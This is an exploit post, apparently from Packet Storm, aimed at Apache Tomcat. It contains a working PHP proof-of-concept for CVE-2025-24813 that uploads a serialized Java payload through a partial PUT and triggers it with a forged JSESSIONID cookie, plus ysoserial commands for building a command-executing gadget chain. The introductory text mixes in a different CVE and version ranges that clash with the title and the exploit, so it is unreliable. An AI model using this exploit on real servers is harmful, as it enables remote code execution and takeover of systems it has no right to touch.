Apache Tomcat 11.0.3 Remote Session Injection

Apache Tomcat 11.0.3 (and other versions like 10.1.x, 9.0.x, 8.5.x) Apache Tomcat 11.0.3 (and other versions like 10.1.x, 9.0.x, 8.5.x) was vulnerable to a Remote Session Injection (CVE-2024-21733).

This flaw stemmed from how Tomcat handled `JSESSIONID`s when creating new sessions after processing a request with an invalid `JSESSIONID`.

An attacker could craft a request containing a specific `JSESSIONID`. Tomcat would then *reuse* this attacker-provided ID for a subsequent, legitimate user's newly created session.

This effectively allowed session fixation or hijacking. The attacker, knowing the session ID, could then impersonate the victim or access their authenticated session.

Affected versions included 11.0.0-M1 to 11.0.0-M17, 10.1.0-M1 to 10.1.17, 9.0.0-M1 to 9.0.86, and 8.5.0 to 8.5.97. The vulnerability was patched by upgrading to Tomcat 11.0.0-M18, 10.1.18, 9.0.87, or 8.5.98.

=============================================================================================================================================
| # Title : Apache Tomcat 11.0.3 Remote Session Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://tomcat.apache.org/ |
=============================================================================================================================================

[+] Summary :

A vulnerability allows attackers to upload a .session file containing a malicious Java serialized payload and then trigger it through a forged JSESSIONID cookie.

[+] References : ( CVE-2025-24813 )

1. Save the file as: poc.php

2. Edit the target:
```php
$target = "http://TARGET";

3.Execute: php poc.php

[+] POC

<?php
/*
CVE-2025-24813 ? PHP Exploit
Author: Indoushka
Packet Storm Security
*/

function rand_filename($length = 6) {
$chars = 'abcdefghijklmnopqrstuvwxyz';
$name = '';
for ($i = 0; $i < $length; $i++) {
$name .= $chars[random_int(0, strlen($chars)-1)];
}
return $name;
}

function generate_payload($interact_url) {
// Java Serialized payload (replace with your custom gadget)
return "\xac\xed\x00\x05\x73\x72\x00\x04\x44\x75\x6d\x6d\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x78\x70";

}

function exploit($target, $interact_url) {

$filename = rand_filename();
$put_url = $target . "/" . $filename . ".session";
$get_url = $target . "/" . $filename;

echo "[+] Exploit for CVE-2025-24813\n";
echo "[+] By Indoushka\n\n";
echo "[+] Uploading payload to: $put_url\n";

$payload = generate_payload($interact_url);

$headers = [
"Content-Range: bytes 0-452/457",
"Content-Type: application/octet-stream"
];

$opts = [
'http' => [
'method' => "PUT",
'header' => implode("\r\n", $headers),
'content' => $payload,
'ignore_errors' => true
]
];

$context = stream_context_create($opts);
$result = @file_get_contents($put_url, false, $context);

preg_match('/HTTP\/\d\.\d\s+(\d+)/', $http_response_header[0], $m);
$status = $m[1];

if ($status == 201) {
echo "[+] Payload uploaded successfully.\n";
} else {
echo "[-] Upload failed with status: $status\n";
return;
}

echo "[+] Triggering payload via: $get_url\n";

$opts2 = [
'http' => [
'method' => "GET",
'header' => "Cookie: JSESSIONID=.$filename\r\n",
'ignore_errors' => true
]
];

$context2 = stream_context_create($opts2);
@file_get_contents($get_url, false, $context2);

echo "[+] Trigger request sent. Check your Interactsh callback: $interact_url\n";
}

// ====== Interactive Shell ======
echo "[+] Exploit for CVE-2025-24813\n";
echo "[+] Made By Indoushka\n\n";

echo "Target URL: ";
$target = trim(fgets(STDIN));

echo "Interact URL: ";
$interact = trim(fgets(STDIN));

exploit($target, $interact);
?>



------------

Generating a gadgets chain:

Generate a Commons-Collections-4 payload to execute the command: whoami

java -jar ysoserial.jar CommonsCollections4 "whoami" > payload.bin

Convert it to hex or base64 for input into PHP : xxd -p payload.bin

Place it where: return "<hex serialized bytes>";



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================